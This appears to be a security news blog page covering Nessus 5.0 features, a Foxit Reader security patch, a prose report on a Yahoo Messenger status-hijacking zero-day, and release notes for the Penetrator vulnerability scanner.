  • Over two dozen new pre-built plugin filters make it easy for security and compliance professionals to simplify policy creation for laser-focused scans on the areas that matter most. Users can quickly select multiple filter criteria, such as vulnerability publication date, public vulnerability database ID (OSVDB, Bugtraq, CERT Advisory, and Secunia), plugin type (local or remote), information assurance vulnerability alert (IAVA), and more, to quickly identify easily-exploitable vulnerabilities. For example:
  • Scan for all easily remotely-exploitable vulnerabilities for which there is an exploit published in your favorite exploit framework.
  • Scan for local third-party client software that is unpatched.
  • Scan for systems that have been missing patches for more than a year.
  • Policies can be configured to produce reports that are locked to prevent editing.
Scan Execution: Improved efficiency:-
Nessus 5.0 users can take advantage of real-time scan results, on-the-fly filtering and sorting, and streamlined results navigation:
  • New criticality level: Nessus v5.0 now has five severity levels — Informational, Low Risk, Medium Risk, High Risk, and Critical Risk. The Informational level quickly identifies non-vulnerability information and separates it from the vulnerability detail.
  • Example: A user may want to run a query against all hosts running web servers not on the normal http or https ports, port 80 or port 443. The Informational level allows a user to quickly identify information that may be useful, but does not require immediate attention — keeping the focus on the actionable results.
  • New vulnerability summary: A new vulnerability summary and redesigned host summary make it easy to see risk level without even running a report.
  • Streamlined results navigation: One click jumps from a critical vulnerability to the host(s) that are vulnerable and on to the details of the vulnerability.
  • Take advantage of real-time results: As the scan is being run, not only can you see the results as they are being gathered, but navigate and filter on them as well. This allows you to easily act upon the vulnerability data while the scan is happening.

Report Customization:-

New reporting features allow for improved communication of vulnerability results with all parts of the organization:
  • Results filtering and report creation: Results filtering and report creation is more flexible than ever before. Users can apply multiple result filtering criteria, and targeted reports can be generated against the filtered results.
  • Create reports that contain only exploitable vulnerabilities, multiple risk levels (e.g., only show critical and high risk findings), filter on CVE or Bugtraq ID, plugin name, and more!
  • Reports customized by audience: Reports can be customized for executives, systems administrators, or auditors. A user can exclude particular vulnerabilities from a report before it is generated, allowing delivery of results targeted to specific audiences.
  • Example: During an internal scan, Nessus will report that a DNS server allows recursive queries, which is its function on the internal network. As this is a known condition, a user can suppress this result in the generated report to keep focus on true vulnerabilities.
  • With four new pre-configured report formats — Compliance Check, Compliance Check (Executive), Vulnerabilities by Host, and Vulnerabilities by Plugin — users can quickly create reports by chapters.
  • Example: The company’s compliance policy dictates that passwords be greater than ten characters in length. Nessus v5.0 runs a scan against the baseline, and the Compliance Check (Executive) report shows a pass/fail result to indicate if all hosts on the network are compliant with the minimum password length. With pass/fail results, the Compliance Check (Executive) report provides a quick snapshot of the company’s compliance checklist status.
  • Report formats: Reports can be generated in native Nessus formats, HTML, and now PDF formats (requires Oracle Java be installed on the Nessus server).
  • The new PDF report format makes it easier to share reports.
  • Combined reports: Multiple report templates can be combined into one report.
  • A single report can now contain vulnerabilities sorted by host and by IP address/hostname.

To Download Nessus click Here




Foxit Reader 5.1.3 Released, Critical Security Hole Patched


The popular PDF reader Foxit Reader has released its next version. This release closes a critical security hole found by security specialist Secunia. Earlier, in a report, Secunia said that the vulnerability in Foxit Reader can be exploited by malicious people to compromise a user's system. The vulnerability is caused by an unspecified error. The issue was reported to the company early last month, and versions up to and including Foxit Reader 5.1.0.1021 are affected; users are therefore advised to upgrade to 5.1.3 to fix the issue. For more information you can check the official press release.


To Download Foxit Reader 5.1.3 Click Here



0-Day Vulnerability in Yahoo Messenger, An Attacker Can Change The Status Update Remotely


A zero-day exploit has been found in Yahoo Messenger that allows attackers to change a user's status update remotely. Version 11.x of the Messenger client (including the freshly-released 11.5.0.152-us) is affected by this 0-day vulnerability. The status message change occurs when an attacker simulates sending a file to a user. This action manipulates the $InlineAction parameter (responsible for the way the Messenger form displays the accept-or-deny prompt for the transfer) in order to load an iFrame which, when loaded, swaps the status message for the attacker's custom text. This status may also include a dubious link. The iFrame is sent as a regular message and comes from another Yahoo Instant Messenger user, even if that user is not in the victim's contact list. As Bitdefender describes it, the bogus file tricks Messenger into loading an iFrame that then swaps the status message for whatever garbage the attacker wants to load, including a potentially "dubious" link.

  • Why is it so dangerous?
Status messages are highly efficient in terms of click-through rate, as they address a small group of friends. Chances are that, once displayed, they will be clicked by most contacts who see them. One scenario: the victim's status message is swapped with an attention-getting text that points to a page hosting a zero-day exploit targeting the IE browser, the locally installed Java or Flash environments or even a PDF bug, to mention only a few. Whenever a contact clicks on the victim’s status message, chances are they get infected without even knowing it. All this time, the victim is unaware that their status message has been hijacked.
Another lucrative approach to changed status messages is affiliate marketing (i.e. sites that pay affiliates for visits or purchases through a custom link). Someone can easily set up an affiliate account, generate custom links for the products in a campaign, then massively target vulnerable YIM victims to change their status to the affiliate link. Then they just wait for the contact-generated traffic to kick in. There are actually a couple of services that pay YIM users to change their status to custom links as part of their business.


  • Who is Safe?
You are safe if:
  • You are running a Bitdefender security solution (Bitdefender Antivirus Plus, Bitdefender Internet Security or Bitdefender Total Security). Bitdefender detects this threat via its HTTP scanner and blocks it before it reaches the Messenger application.
  • You have Yahoo Messenger set to "ignore anyone who is not in your Yahoo! Contacts" (which is off by default).



Penetrator Vulnerability Scanner 9.9 By SecPoint



One of the leading IT-security companies, SecPoint, has released a new version of its award-winning Penetrator to provide comprehensive protection to any business with a wireless network. The update includes powerful new applications to boost corporate security, such as a Google Hacking Database, to identify whether sensitive company information or files have been indexed by search engines; improved word lists for cracking (now more than 1.1 billion entries); and an Easy Wifi Security Assessment to show whether a Wifi network is vulnerable. This release adds more than 50 improvements, and the firmware is for both the Penetrator and the Portable Penetrator.

The New Version Includes :-
- Improved vhost scan
- Improved pdf download
- Improved speed for add IP
- New icon placed
- System status in admin area too.
- New customized menu items.
- Improved back and next features.
- Start scan speed improved.
- Report processing is improved.
- Xml report structure improved.
- Automatic Virtual host vhost domain scanning in new scans.
- Automatic Virtual host vhost domain scanning in new audit scans.
- Automatic Virtual host vhost domain scanning in new template scans.
- Improved system logs section option to delete pending scans.
- Improved IP Address settings process.
- Improved audit schedule.
- On Group scan page added audit text.
- Improved edit audit scan schedules.
- Automatic email when audit scans are completed.
- Updated back button.
- Improved Word List download.
- New more user friendly Icons.
- Improved cracking of multiple wifi networks.
- Added SYN port scan for bettering scanning of weak routers.
- Faster port scanning.
- Improved WPA/WPA2 cracking.
- And so on



For more information click Here



